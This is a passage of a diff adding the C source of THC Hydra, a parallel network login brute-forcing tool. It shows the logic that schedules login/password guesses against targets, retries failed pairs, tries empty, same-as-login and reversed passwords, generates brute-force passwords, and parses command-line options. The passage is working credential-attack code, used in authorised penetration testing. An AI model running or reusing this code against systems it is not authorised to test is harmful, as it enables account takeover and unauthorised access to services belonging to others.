-2) + ) { + k = 0; + for (i = 0; i < hydra_options.max_use; i++) + if (hydra_heads[i]->active >= 0 && hydra_heads[i]->target_no == target_no) + k++; + if (k <= 1) { + // we need to put this in a list, otherwise we fail one login+pw test + if (hydra_targets[target_no]->done == 0 + && hydra_targets[target_no]->redo <= hydra_options.max_use * 2 + && ((hydra_heads[head_no]->current_login_ptr != empty_login && hydra_heads[head_no]->current_pass_ptr != empty_login) + || (hydra_heads[head_no]->current_login_ptr != NULL && hydra_heads[head_no]->current_pass_ptr != NULL))) { + hydra_targets[target_no]->redo_login[hydra_targets[target_no]->redo] = hydra_heads[head_no]->current_login_ptr; + hydra_targets[target_no]->redo_pass[hydra_targets[target_no]->redo] = hydra_heads[head_no]->current_pass_ptr; + hydra_targets[target_no]->redo++; + if (debug) + printf("[DEBUG] - will be retried at the end: ip %s - login %s - pass %s - child %d\n", hydra_targets[target_no]->target, + hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr, head_no); + hydra_heads[head_no]->current_login_ptr = empty_login; + hydra_heads[head_no]->current_pass_ptr = empty_login; + } + if (hydra_targets[target_no]->fail_count >= MAXFAIL + hydra_options.tasks * hydra_targets[target_no]->ok) { + hydra_kill_head(head_no, 1, 2); + if (hydra_targets[target_no]->done == 0 && hydra_options.max_use == hydra_targets[target_no]->failed) { + if (hydra_targets[target_no]->ok == 1) + hydra_targets[target_no]->done = 2; // mark target as done by errors + else + hydra_targets[target_no]->done = 3; // mark target as done by unable to connect + hydra_brains.finished++; + fprintf(stderr, "[ERROR] Too many connect errors to target, disabling %s://%s%s%s:%d\n", hydra_options.service, hydra_targets[target_no]->ip[0] == 16 + && index(hydra_targets[target_no]->target, ':') != NULL ? "[" : "", hydra_targets[target_no]->target, hydra_targets[target_no]->ip[0] == 16 + && index(hydra_targets[target_no]->target, ':') != NULL ? "]" : "", port); + } + } // we keep the last one alive as long as it make sense + } else { + // we need to put this in a list, otherwise we fail one login+pw test + if (hydra_targets[target_no]->done == 0 + && hydra_targets[target_no]->redo <= hydra_options.max_use * 2 + && ((hydra_heads[head_no]->current_login_ptr != empty_login && hydra_heads[head_no]->current_pass_ptr != empty_login) + || (hydra_heads[head_no]->current_login_ptr != NULL && hydra_heads[head_no]->current_pass_ptr != NULL))) { + hydra_targets[target_no]->redo_login[hydra_targets[target_no]->redo] = hydra_heads[head_no]->current_login_ptr; + hydra_targets[target_no]->redo_pass[hydra_targets[target_no]->redo] = hydra_heads[head_no]->current_pass_ptr; + hydra_targets[target_no]->redo++; + if (debug) + printf("[DEBUG] - will be retried at the end: ip %s - login %s - pass %s - child %d\n", hydra_targets[target_no]->target, + hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr, head_no); + hydra_heads[head_no]->current_login_ptr = empty_login; + hydra_heads[head_no]->current_pass_ptr = empty_login; + } + hydra_kill_head(head_no, 1, 2); + hydra_targets[target_no]->fail_count--; + if (k < 5 && hydra_targets[target_no]->ok) + hydra_targets[target_no]->fail_count--; + if (k == 2 && hydra_targets[target_no]->ok) + hydra_targets[target_no]->fail_count--; + if (verbose) + printf("[VERBOSE] Disabled child %d because of too many errors\n", head_no); + } + } else { + hydra_kill_head(head_no, 1, 1); + if (verbose) + printf("[VERBOSE] Retrying connection for child %d\n", head_no); + } +} + +char *hydra_reverse_login(int head_no, char *login) { + int i, j = strlen(login); + + if (j > 248) + j = 248; + else if (j == 0) + return empty_login; + for (i = 0; i < j; i++) + hydra_heads[head_no]->reverse[i] = login[j - (i + 1)]; + hydra_heads[head_no]->reverse[j] = 0; + + return hydra_heads[head_no]->reverse; +} + +int hydra_send_next_pair(int target_no, int head_no) { + // variables moved to save stack + snpdone = 0; + snp_is_redo = 0; + snpdont = 0; + loop_cnt++; + if (hydra_targets[target_no]->sent >= hydra_brains.todo + hydra_targets[target_no]->redo) { + if (hydra_targets[target_no]->done == 0) { + hydra_targets[target_no]->done = 1; + hydra_brains.finished++; + if (verbose) + printf("[STATUS] attack finished for %s (waiting for children to complete tests)\n", hydra_targets[target_no]->target); + } + return -1; + } + if (loop_cnt > (hydra_brains.countlogin * 2) + 1 && loop_cnt > (hydra_brains.countpass * 2) + 1) { + if (debug) + printf("[DEBUG] too many loops in send_next_pair, returning -1 (loop_cnt %d, sent %ld, todo %ld)\n", loop_cnt, hydra_targets[target_no]->sent, hydra_brains.todo); + return -1; + } + + if (debug) + printf + ("[DEBUG] send_next_pair_init target %d, head %d, redo %d, redo_state %d, pass_state %d. loop_mode %d, curlogin %s, curpass %s, tlogin %s, tpass %s, logincnt %lu/%lu, passcnt %lu/%lu, loop_cnt %d\n", + target_no, head_no, hydra_heads[head_no]->redo, hydra_targets[target_no]->redo_state, hydra_targets[target_no]->pass_state, hydra_options.loop_mode, + hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr, hydra_targets[target_no]->login_ptr, hydra_targets[target_no]->pass_ptr, + hydra_targets[target_no]->login_no, hydra_brains.countlogin, hydra_targets[target_no]->pass_no, hydra_brains.countpass, loop_cnt); + if (hydra_heads[head_no]->redo && hydra_heads[head_no]->current_login_ptr != NULL && hydra_heads[head_no]->current_pass_ptr != NULL) { + hydra_heads[head_no]->redo = 0; + snp_is_redo = 1; + snpdone = 1; + } else { + if (debug && (hydra_heads[head_no]->current_login_ptr != NULL || hydra_heads[head_no]->current_pass_ptr != NULL)) + printf("[COMPLETED] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu\n", + hydra_targets[target_no]->target, hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr, head_no, + hydra_targets[target_no]->sent, hydra_brains.todo); + hydra_heads[head_no]->redo = 0; + if (hydra_targets[target_no]->redo_state > 0) { + if (hydra_targets[target_no]->redo_state + 1 <= hydra_targets[target_no]->redo) { + hydra_heads[head_no]->current_pass_ptr = hydra_targets[target_no]->redo_pass[hydra_targets[target_no]->redo_state - 1]; + hydra_heads[head_no]->current_login_ptr = hydra_targets[target_no]->redo_login[hydra_targets[target_no]->redo_state - 1]; + hydra_targets[target_no]->redo_state++; + snpdone = 1; + } // no else, that way a later lost pair is still added and done + } else { // normale state, no redo + if (hydra_targets[target_no]->done) { + loop_cnt = 0; + return -1; // head will be disabled by main while() + } + if (hydra_options.loop_mode == 0) { // one user after another + if (hydra_targets[target_no]->login_no < hydra_brains.countlogin) { + // as we loop password in mode == 0 we set the current login first + hydra_heads[head_no]->current_login_ptr = hydra_targets[target_no]->login_ptr; + // then we do the extra options -e ns handling + if (hydra_targets[target_no]->pass_state == 0 && snpdone == 0) { + if (hydra_options.try_password_same_as_login) { + hydra_heads[head_no]->current_pass_ptr = hydra_targets[target_no]->login_ptr; + snpdone = 1; + hydra_targets[target_no]->pass_no++; + } + hydra_targets[target_no]->pass_state++; + } + if (hydra_targets[target_no]->pass_state == 1 && snpdone == 0) { + // small check that there is a login name (could also be emtpy) and if we already tried empty password it would be a double + if (hydra_options.try_null_password) { + if (hydra_options.try_password_same_as_login == 0 || (hydra_targets[target_no]->login_ptr != NULL && strlen(hydra_targets[target_no]->login_ptr) > 0)) { + hydra_heads[head_no]->current_pass_ptr = empty_login; + snpdone = 1; + } else { + hydra_brains.sent++; + hydra_targets[target_no]->sent++; + } + hydra_targets[target_no]->pass_no++; + } + hydra_targets[target_no]->pass_state++; + } + if (hydra_targets[target_no]->pass_state == 2 && snpdone == 0) { + // small check that there is a login name (could also be emtpy) and if we already tried empty password it would be a double + if (hydra_options.try_password_reverse_login) { + if ((hydra_options.try_password_same_as_login == 0 + || strcmp(hydra_targets[target_no]->login_ptr, hydra_reverse_login(head_no, hydra_heads[head_no]->current_login_ptr)) != 0) + && (hydra_options.try_null_password == 0 || (hydra_targets[target_no]->login_ptr != NULL && strlen(hydra_targets[target_no]->login_ptr) > 0))) { + hydra_heads[head_no]->current_pass_ptr = hydra_reverse_login(head_no, hydra_heads[head_no]->current_login_ptr); + snpdone = 1; + } else { + hydra_brains.sent++; + hydra_targets[target_no]->sent++; + } + hydra_targets[target_no]->pass_no++; + } + hydra_targets[target_no]->pass_state++; + } + // now we handle the -C -l/-L -p/-P data + if (hydra_targets[target_no]->pass_state == 3 && snpdone == 0) { + if ((hydra_options.mode & 64) == 64) { // colon mode + hydra_heads[head_no]->current_login_ptr = hydra_targets[target_no]->login_ptr; + hydra_heads[head_no]->current_pass_ptr = hydra_targets[target_no]->pass_ptr; + hydra_targets[target_no]->login_no++; + snpdone = 1; + hydra_targets[target_no]->login_ptr = hydra_targets[target_no]->pass_ptr; + //hydra_targets[target_no]->login_ptr++; + while (*hydra_targets[target_no]->login_ptr != 0) + hydra_targets[target_no]->login_ptr++; + hydra_targets[target_no]->login_ptr++; + hydra_targets[target_no]->pass_ptr = hydra_targets[target_no]->login_ptr; + //hydra_targets[target_no]->pass_ptr++; + while (*hydra_targets[target_no]->pass_ptr != 0) + hydra_targets[target_no]->pass_ptr++; + hydra_targets[target_no]->pass_ptr++; + if (strcmp(hydra_targets[target_no]->login_ptr, hydra_heads[head_no]->current_login_ptr) != 0) + hydra_targets[target_no]->pass_state = 0; + if ((hydra_options.try_password_same_as_login && strcmp(hydra_heads[head_no]->current_pass_ptr, hydra_heads[head_no]->current_login_ptr) == 0) + || (hydra_options.try_null_password && strlen(hydra_heads[head_no]->current_pass_ptr) == 0) + || + (hydra_options.try_password_reverse_login + && strcmp(hydra_heads[head_no]->current_pass_ptr, hydra_reverse_login(head_no, hydra_heads[head_no]->current_login_ptr)) == 0)) { + hydra_brains.sent++; + hydra_targets[target_no]->sent++; + if (debug) + printf("[DEBUG] double detected (-C)\n"); + return hydra_send_next_pair(target_no, head_no); // little trick to keep the code small + } + } else { // standard -l -L -p -P mode + hydra_heads[head_no]->current_pass_ptr = hydra_targets[target_no]->pass_ptr; + hydra_targets[target_no]->pass_no++; + // double check + if (hydra_targets[target_no]->pass_no >= hydra_brains.countpass) { + // all passwords done, next user for next password + hydra_targets[target_no]->login_ptr++; + while (*hydra_targets[target_no]->login_ptr != 0) + hydra_targets[target_no]->login_ptr++; + hydra_targets[target_no]->login_ptr++; + hydra_targets[target_no]->pass_ptr = pass_ptr; + hydra_targets[target_no]->login_no++; + hydra_targets[target_no]->pass_no = 0; + hydra_targets[target_no]->pass_state = 0; + if (hydra_brains.countpass == hydra_options.try_password_reverse_login + hydra_options.try_null_password + hydra_options.try_password_same_as_login) + return hydra_send_next_pair(target_no, head_no); + } else { + hydra_targets[target_no]->pass_ptr++; + while (*hydra_targets[target_no]->pass_ptr != 0) + hydra_targets[target_no]->pass_ptr++; + hydra_targets[target_no]->pass_ptr++; + } + if ((hydra_options.try_password_same_as_login && strcmp(hydra_heads[head_no]->current_pass_ptr, hydra_heads[head_no]->current_login_ptr) == 0) + || (hydra_options.try_null_password && strlen(hydra_heads[head_no]->current_pass_ptr) == 0) + || + (hydra_options.try_password_reverse_login + && strcmp(hydra_heads[head_no]->current_pass_ptr, hydra_reverse_login(head_no, hydra_heads[head_no]->current_login_ptr)) == 0)) { + hydra_brains.sent++; + hydra_targets[target_no]->sent++; + if (debug) + printf("[DEBUG] double detected (-Pp)\n"); + return hydra_send_next_pair(target_no, head_no); // little trick to keep the code small + } + snpdone = 1; + } + } + } + } else { // loop_mode == 1 + if (hydra_targets[target_no]->pass_no < hydra_brains.countpass) { + hydra_heads[head_no]->current_login_ptr = hydra_targets[target_no]->login_ptr; + if (hydra_targets[target_no]->pass_state == 0) { + if ((hydra_options.mode & 4) == 4) + hydra_heads[head_no]->current_pass_ptr = strdup(hydra_heads[head_no]->current_login_ptr); + else + hydra_heads[head_no]->current_pass_ptr = hydra_heads[head_no]->current_login_ptr; + } else if (hydra_targets[target_no]->pass_state == 1) { + if ((hydra_options.mode & 4) == 4) + hydra_heads[head_no]->current_pass_ptr = strdup(empty_login); + else + hydra_heads[head_no]->current_pass_ptr = empty_login; + } else if (hydra_targets[target_no]->pass_state == 2) { + if ((hydra_options.mode & 4) == 4) + hydra_heads[head_no]->current_pass_ptr = strdup(hydra_reverse_login(head_no, hydra_heads[head_no]->current_login_ptr)); + else + hydra_heads[head_no]->current_pass_ptr = hydra_reverse_login(head_no, hydra_heads[head_no]->current_login_ptr); + } else { + if (hydra_options.bfg && hydra_targets[target_no]->pass_state == 3 + && hydra_heads[head_no]->current_pass_ptr != NULL && + strlen(hydra_heads[head_no]->current_pass_ptr) > 0 && hydra_heads[head_no]->current_pass_ptr != hydra_heads[head_no]->current_login_ptr) + free(hydra_heads[head_no]->current_pass_ptr); + hydra_heads[head_no]->current_pass_ptr = strdup(hydra_targets[target_no]->pass_ptr); + } + hydra_targets[target_no]->login_no++; + snpdone = 1; + + if (hydra_targets[target_no]->login_no >= hydra_brains.countlogin) { + if (hydra_targets[target_no]->pass_state < 3) { + hydra_targets[target_no]->pass_state++; + if (hydra_targets[target_no]->pass_state == 1 && hydra_options.try_null_password == 0) + hydra_targets[target_no]->pass_state++; + if (hydra_targets[target_no]->pass_state == 2 && hydra_options.try_password_reverse_login == 0) + hydra_targets[target_no]->pass_state++; + if (hydra_targets[target_no]->pass_state == 3) + snpdont = 1; + hydra_targets[target_no]->pass_no++; + } + + if (hydra_targets[target_no]->pass_state == 3) { + if (snpdont) { + hydra_targets[target_no]->pass_ptr = pass_ptr; + } else { + if ((hydra_options.mode & 4) == 4) { // bfg mode +#ifndef HAVE_MATH_H + sleep(1); +#else + hydra_targets[target_no]->pass_ptr = bf_next(); + if (debug) + printf("[DEBUG] bfg new password for next child: %s\n", hydra_targets[target_no]->pass_ptr); +#endif + } else { // -p -P mode + hydra_targets[target_no]->pass_ptr++; + while (*hydra_targets[target_no]->pass_ptr != 0) + hydra_targets[target_no]->pass_ptr++; + hydra_targets[target_no]->pass_ptr++; + } + hydra_targets[target_no]->pass_no++; + } + } + + hydra_targets[target_no]->login_no = 0; + hydra_targets[target_no]->login_ptr = login_ptr; + } else if (hydra_targets[target_no]->login_no < hydra_brains.countlogin) { + hydra_targets[target_no]->login_ptr++; + while (*hydra_targets[target_no]->login_ptr != 0) + hydra_targets[target_no]->login_ptr++; + hydra_targets[target_no]->login_ptr++; + } + if (hydra_targets[target_no]->pass_state == 3 && snpdont == 0) { + if ((hydra_options.try_null_password && strlen(hydra_heads[head_no]->current_pass_ptr) < 1) + || (hydra_options.try_password_same_as_login && strcmp(hydra_heads[head_no]->current_pass_ptr, hydra_heads[head_no]->current_login_ptr) == 0) + || (hydra_options.try_password_reverse_login && strcmp(hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr) == 0)) { + hydra_brains.sent++; + hydra_targets[target_no]->sent++; + if (debug) + printf("[DEBUG] double detected (1)\n"); + return hydra_send_next_pair(target_no, head_no); // little trick to keep the code small + } + } + } + } + } + + if (debug) + printf("[DEBUG] send_next_pair_mid done %d, pass_state %d, clogin %s, cpass %s, tlogin %s, tpass %s, redo %d\n", + snpdone, hydra_targets[target_no]->pass_state, hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr, hydra_targets[target_no]->login_ptr, + hydra_targets[target_no]->pass_ptr, hydra_targets[target_no]->redo); + + // no pair? then we go for redo state + if (!snpdone && hydra_targets[target_no]->redo_state == 0 && hydra_targets[target_no]->redo > 0) { + if (debug) + printf("[DEBUG] Entering redo_state\n"); + hydra_targets[target_no]->redo_state++; + return hydra_send_next_pair(target_no, head_no); // little trick to keep the code small + } + } + + if (!snpdone || hydra_targets[target_no]->skipcnt >= hydra_brains.countlogin) { + fck = write(hydra_heads[head_no]->sp[0], HYDRA_EXIT, sizeof(HYDRA_EXIT)); + if (hydra_targets[target_no]->use_count <= 1) { + if (hydra_targets[target_no]->done == 0) { + hydra_targets[target_no]->done = 1; + hydra_brains.finished++; + printf("[STATUS] attack finished for %s (waiting for children to finish) ...\n", hydra_targets[target_no]->target); + } + } + //hydra_kill_head(head_no, 1, 2); // done in main while loop + } else { + if (hydra_targets[target_no]->skipcnt > 0) { + snpj = 0; + for (snpi = 0; snpi < hydra_targets[target_no]->skipcnt && snpj == 0; snpi++) + if (strcmp(hydra_heads[head_no]->current_login_ptr, hydra_targets[target_no]->skiplogin[snpi]) == 0) + snpj = 1; + if (snpj) { + if (snp_is_redo == 0) { + hydra_brains.sent++; + hydra_targets[target_no]->sent++; + } + if (debug) + printf("[DEBUG] double found for %s == %s, skipping\n", hydra_heads[head_no]->current_login_ptr, hydra_targets[target_no]->skiplogin[snpi - 1]); + // only if -l/L -p/P with -u and if loginptr was not justed increased + if ((hydra_options.mode & 64) != 64 && hydra_options.loop_mode == 0 && hydra_targets[target_no]->pass_no > 0) { // -l -P (not! -u) + // increase login_ptr to next + hydra_targets[target_no]->login_no++; + if (hydra_targets[target_no]->login_no < hydra_brains.countlogin) { + hydra_targets[target_no]->login_ptr++; + while (*hydra_targets[target_no]->login_ptr != 0) + hydra_targets[target_no]->login_ptr++; + hydra_targets[target_no]->login_ptr++; + } + // add count + hydra_brains.sent += hydra_brains.countpass - hydra_targets[target_no]->pass_no; + hydra_targets[target_no]->sent += hydra_brains.countpass - hydra_targets[target_no]->pass_no; + // reset password list + hydra_targets[target_no]->pass_ptr = pass_ptr; + hydra_targets[target_no]->pass_no = 0; + hydra_targets[target_no]->pass_state = 0; + } + return hydra_send_next_pair(target_no, head_no); // little trick to keep the code small + } + } + + memset(&snpbuf, 0, sizeof(snpbuf)); + strncpy(snpbuf, hydra_heads[head_no]->current_login_ptr, MAXLINESIZE - 3); + if (strlen(hydra_heads[head_no]->current_login_ptr) > MAXLINESIZE - 3) + snpbuflen = MAXLINESIZE - 2; + else + snpbuflen = strlen(hydra_heads[head_no]->current_login_ptr) + 1; + strncpy(snpbuf + snpbuflen, hydra_heads[head_no]->current_pass_ptr, MAXLINESIZE - snpbuflen - 1); + if (strlen(hydra_heads[head_no]->current_pass_ptr) > MAXLINESIZE - snpbuflen - 1) + snpbuflen += MAXLINESIZE - snpbuflen - 1; + else + snpbuflen += strlen(hydra_heads[head_no]->current_pass_ptr) + 1; + if (snp_is_redo == 0) { + hydra_brains.sent++; + hydra_targets[target_no]->sent++; + } else if (debug) + printf("[DEBUG] send_next_pair_redo done %d, pass_state %d, clogin %s, cpass %s, tlogin %s, tpass %s, is_redo %d\n", + snpdone, hydra_targets[target_no]->pass_state, hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr, hydra_targets[target_no]->login_ptr, + hydra_targets[target_no]->pass_ptr, snp_is_redo); + //hydra_dump_data(snpbuf, snpbuflen, "SENT"); + fck = write(hydra_heads[head_no]->sp[0], snpbuf, snpbuflen); + if (fck < snpbuflen) { + if (verbose) + fprintf(stderr, "[ERROR] can not write to child %d, restarting it ...\n", head_no); + hydra_increase_fail_count(target_no, head_no); + loop_cnt = 0; + return 0; // not prevent disabling it, if its needed its already done in the above line + } + if (debug || hydra_options.showAttempt) { + printf("[%sATTEMPT] target %s - login \"%s\" - pass \"%s\" - %lu of %lu [child %d]\n", + hydra_targets[target_no]->redo_state ? "REDO-" : snp_is_redo ? "RE-" : "", hydra_targets[target_no]->target, hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr, + hydra_targets[target_no]->sent, hydra_brains.todo + hydra_targets[target_no]->redo, head_no); + } + loop_cnt = 0; + return 0; + } + loop_cnt = 0; + return -1; +} + +void hydra_skip_user(int target_no, char *username) { + int i; + + if (username == NULL || *username == 0) + return; + + // double check + for (i = 0; i < hydra_targets[target_no]->skipcnt; i++) + if (strcmp(username, hydra_targets[target_no]->skiplogin[i]) == 0) + return; + + if (hydra_targets[target_no]->skipcnt < SKIPLOGIN && (hydra_targets[target_no]->skiplogin[hydra_targets[target_no]->skipcnt] = malloc(strlen(username) + 1)) != NULL) { + strcpy(hydra_targets[target_no]->skiplogin[hydra_targets[target_no]->skipcnt], username); + hydra_targets[target_no]->skipcnt++; + } + if (hydra_options.loop_mode == 0 && (hydra_options.mode & 64) != 64) { + if (memcmp(username, hydra_targets[target_no]->login_ptr, strlen(username)) == 0) { + if (debug) + printf("[DEBUG] skipping username %s\n", username); + // increase count + hydra_brains.sent += hydra_brains.countpass - hydra_targets[target_no]->pass_no; + hydra_targets[target_no]->sent += hydra_brains.countpass - hydra_targets[target_no]->pass_no; + // step to next login + hydra_targets[target_no]->login_no++; + if (hydra_targets[target_no]->login_no < hydra_brains.countlogin) { + hydra_targets[target_no]->login_ptr++; + while (*hydra_targets[target_no]->login_ptr != 0) + hydra_targets[target_no]->login_ptr++; + hydra_targets[target_no]->login_ptr++; + } + // reset password state + hydra_targets[target_no]->pass_ptr = pass_ptr; + hydra_targets[target_no]->pass_no = 0; + hydra_targets[target_no]->pass_state = 0; + } + } +} + +int hydra_check_for_exit_condition() { + int i, k = 0; + + if (hydra_brains.exit) { + if (debug) + printf("[DEBUG] exit was forced\n"); + return -1; + } + if (hydra_brains.targets <= hydra_brains.finished && hydra_brains.active < 1) { + if (debug) + printf("[DEBUG] all targets done and all heads finished\n"); + return 1; + } + if (hydra_brains.active < 1) { + // no head active?! check if they are all disabled, if so, we are done + for (i = 0; i < hydra_options.max_use && k == 0; i++) + if (hydra_heads[i]->active >= 0) + k = 1; + if (k == 0) { + fprintf(stderr, "[ERROR] all children were disabled due too many connection errors\n"); + return -1; + } + } + return 0; +} + +int hydra_select_target() { + int target_no = -1, i, j = 0; + + for (i = 0; i < hydra_brains.targets; i++) + if (hydra_targets[i]->use_count < hydra_options.tasks) + if (j < hydra_options.tasks - hydra_targets[i]->failed - hydra_targets[i]->use_count) { + target_no = i; + j = hydra_options.tasks - hydra_targets[i]->failed - hydra_targets[i]->use_count; + } + return target_no; +} + +int main(int argc, char *argv[]) { + char *proxy_string = NULL, *device = NULL, *memcheck; + FILE *lfp = NULL, *pfp = NULL, *cfp = NULL, *ifp = NULL, *rfp = NULL; + size_t countinfile = 1, sizeinfile = 0; + unsigned long int math2; + int i = 0, j = 0, k, error = 0, modusage = 0; + int head_no = 0, target_no = 0, exit_condition = 0, readres; + time_t starttime, elapsed_status, elapsed_restore, status_print = 59, tmp_time; + char *tmpptr; + char rc, buf[MAXBUF]; + fd_set fdreadheads; + int max_fd; + struct addrinfo hints, *res, *p; + struct sockaddr_in6 *ipv6 = NULL; + struct sockaddr_in *ipv4 = NULL; + + printf("%s %s (c) 2014 by %s & %s - Please do not use in military or secret service organizations, or for illegal purposes.\n\n", PROGRAM, VERSION, AUTHOR, AUTHOR2); +#ifndef LIBPOSTGRES + SERVICES = hydra_string_replace(SERVICES, "postgres ", ""); + strcat(unsupported, "postgres "); +#endif +#ifndef LIBSAPR3 + SERVICES = hydra_string_replace(SERVICES, "sapr3 ", ""); + strcat(unsupported, "sapr3 "); +#endif +#ifndef LIBFIREBIRD + SERVICES = hydra_string_replace(SERVICES, "firebird ", ""); + strcat(unsupported, "firebird "); +#endif +#ifndef LIBAFP + SERVICES = hydra_string_replace(SERVICES, "afp ", ""); + strcat(unsupported, "afp "); +#endif +#ifndef LIBNCP + SERVICES = hydra_string_replace(SERVICES, "ncp ", ""); + strcat(unsupported, "ncp "); +#endif +#ifndef LIBSSH + SERVICES = hydra_string_replace(SERVICES, "ssh ", ""); + strcat(unsupported, "ssh "); + SERVICES = hydra_string_replace(SERVICES, "sshkey ", ""); + strcat(unsupported, "sshkey "); +#endif +#ifndef LIBSVN + SERVICES = hydra_string_replace(SERVICES, "svn ", ""); + strcat(unsupported, "svn "); +#endif +#ifndef LIBORACLE + SERVICES = hydra_string_replace(SERVICES, "oracle ", ""); + strcat(unsupported, "oracle "); +#endif +#ifndef LIBMYSQLCLIENT + SERVICES = hydra_string_replace(SERVICES, "mysql ", "mysql(v4) "); + strcat(unsupported, "mysql5 "); +#endif +#ifndef LIBOPENSSL + // for ftps + SERVICES = hydra_string_replace(SERVICES, " ftps", ""); + // for pop3 + SERVICES = hydra_string_replace(SERVICES, "pop3[s]", "pop3"); + // for imap + SERVICES = hydra_string_replace(SERVICES, "imap[s]", "imap"); + // for smtp + SERVICES = hydra_string_replace(SERVICES, "smtp[s]", "smtp"); + // for telnet + SERVICES = hydra_string_replace(SERVICES, "telnet[s]", "telnet"); + // for http[s]-{head|get} + SERVICES = hydra_string_replace(SERVICES, "http[s]", "http"); + // for http[s]-{get|post}-form + SERVICES = hydra_string_replace(SERVICES, "http[s]", "http"); + // for ldap3 + SERVICES = hydra_string_replace(SERVICES, "[-{cram|digest}md5]", ""); + // for sip + SERVICES = hydra_string_replace(SERVICES, " sip", ""); + // for rdp + SERVICES = hydra_string_replace(SERVICES, " rdp", ""); + // for oracle-listener + SERVICES = hydra_string_replace(SERVICES, " oracle-listener", ""); + // general + SERVICES = hydra_string_replace(SERVICES, "[s]", ""); + // for oracle-sid + SERVICES = hydra_string_replace(SERVICES, " oracle-sid", ""); + strcat(unsupported, "SSL-services (ftps, sip, rdp, oracle-services, ...) "); +#endif +#ifndef HAVE_MATH_H + if (strlen(unsupported) > 0) + strcat(unsupported, "and "); + strcat(unsupported, "password bruteforce generation "); +#endif +#ifndef HAVE_PCRE + if (strlen(unsupported) > 0) + strcat(unsupported, "and "); + strcat(unsupported, "regex support "); +#endif + + (void) setvbuf(stdout, NULL, _IONBF, 0); + (void) setvbuf(stderr, NULL, _IONBF, 0); + // set defaults + memset(&hydra_options, 0, sizeof(hydra_options)); + memset(&hydra_brains, 0, sizeof(hydra_brains)); + prg = argv[0]; + hydra_options.debug = debug = 0; + hydra_options.verbose = verbose = 0; + found = 0; + use_proxy = 0; + proxy_string_ip[0] = 0; + proxy_string_port = 0; + strcpy(proxy_string_type, "connect"); + proxy_authentication = cmdlinetarget = NULL; + hydra_options.login = NULL; + hydra_options.loginfile = NULL; + hydra_options.pass = NULL; + hydra_options.passfile = NULL; + hydra_options.tasks = TASKS; + hydra_options.max_use = MAXTASKS; + hydra_brains.ofp = stdout; + hydra_brains.targets = 1; + hydra_options.waittime = waittime = WAITTIME; + + // command line processing + if (argc > 1 && strncmp(argv[1], "-h", 2) == 0) + help(1); + if (argc < 3 && (argc < 2 || strcmp(argv[1], "-R") != 0)) + help(0); + while ((i = getopt(argc, argv, "h64Rde:vVl:fFg:L:p:P:o:M:C:t:T:m:w:W:s:SUux:")) >= 0) { + switch (i) { + case 'h': + help(1); + case 'u': + hydra_options.loop_mode = 1; + break; + case '6': + prefer_ipv6 = 1; + break; + case '4': + prefer_ipv6 = 0; + break; + case 'R': + hydra_options.restore = 1; + if (argc != 2) + bail("no option may be supplied together with -R"); + break; + case 'd': + hydra_options.debug = debug = 1; + ++verbose; + break; + case 'e': + i = 0; + while (i < strlen(optarg)) { + switch (optarg[i]) { + case 'r': + hydra_options.try_password_reverse_login = 1; + hydra_options.mode = hydra_options.mode | 8; + break; + case 'n': + hydra_options.try_null_password = 1; + hydra_options.mode = hydra_options.mode | 16; + break; + case 's': + hydra_options.try_password_same_as_login = 1; + hydra_options.mode = hydra_options.mode | 32; + break; + default: + fprintf(stderr, "[ERROR] unknown mode %c for option -e, only supporting \"n\", \"s\" and \"r\"\n", optarg[i]); + exit(-1); + } + i++; + } + break; + case 'v': + hydra_options.verbose = verbose = 1; + break; + case 'V': + hydra_options.showAttempt = 1; + break; + case 'l': + hydra_options.login = optarg; + break; + case 'L': + hydra_options.loginfile = optarg; + hydra_options.mode = hydra_options.mode | 2; + break; + case 'p': + hydra_options.pass = optarg; + break; + case 'P': + hydra_options.passfile = optarg; + hydra_options.mode = hydra_options.mode | 1; + break; + case 'f': + hydra_options.exit_found = 1; + break; + case 'F': + hydra_options.exit_found = 2; + break; + case 'o': + hydra_options.outfile_ptr = optarg; + colored_output = 0; + break; + case 'M': + hydra_options.infile_ptr = optarg; + break; + case 'C': + hydra_options.colonfile = optarg; + hydra_options.mode = 64; + break; + case 'm': + hydra_options.miscptr = optarg; + break; + case 'w': + hydra_options.waittime = waittime = atoi(optarg); + if (waittime < 1) { + fprintf(stderr, "[ERROR] waittime must be larger than 0\n"); + exit(-1); + } else if (waittime < 5) + fprintf(stderr, "[WARNING] the waittime you set is low, this can result in errornous results\n"); + break; + case 'W': + hydra_options.conwait = conwait = atoi(optarg); + break; + case 's': + hydra_options.port = port = atoi(optarg); + break; + case 'S': +#ifndef LIBOPENSSL + fprintf(stderr, "[WARNING] hydra was compiled without SSL support. Install openssl and recompile! Option ignored...\n"); + hydra_options.ssl = 0; + break; +#else + hydra_options.ssl = 1; + break; +#endif + case 't': + hydra_options.tasks = atoi(optarg); + break; + case 'T': + hydra_options.max_use = atoi(optarg); + break; + case 'U': + modusage = 1; + break; + case 'x': +#ifndef HAVE_MATH_H + fprintf(stderr, "[ERROR] -x option is not available as math.h was not found at compile time\n"); + exit(-1); +#else + if (strcmp(optarg, "-h") == 0) + help_bfg(); + bf_options.arg = optarg; + hydra_options.bfg = 1; + hydra_options.mode = hydra_options.mode | 4; + hydra_options.loop_mode = 1; + break; +#endif + default: + exit(-1); + } + } + + //check if output is redirected from the shell or in a file + if (colored_output && !isatty(fileno(stdout))) + colored_output = 0; + +#ifdef LIBNCURSES + //then check if the term is color enabled using ncurses lib + if (colored_output) { + if (!setupterm(NULL, 1, NULL) && (tigetnum("colors") <= 0)) { + colored_output = 0; + } + } +#else + //don't want border line effect so disabling color output + //if we are not sure about the term + colored_output = 0; +#endif + + if (debug) + printf("[DEBUG] Ouput color flag is %d\n", colored_output); + + printf("%s (%s) starting at %s\n", PROGRAM, RESOURCE, hydra_build_time()); + if (debug) { + printf("[DEBUG] cmdline: "); + for (i = 0; i < argc; i++) + printf("%s ", argv[i]); + printf("\n"); + } + if (hydra_options.login != NULL && hydra_options.loginfile != NULL) + bail("You can only use -L OR -l, not both\n"); + if (hydra_options.pass != NULL && 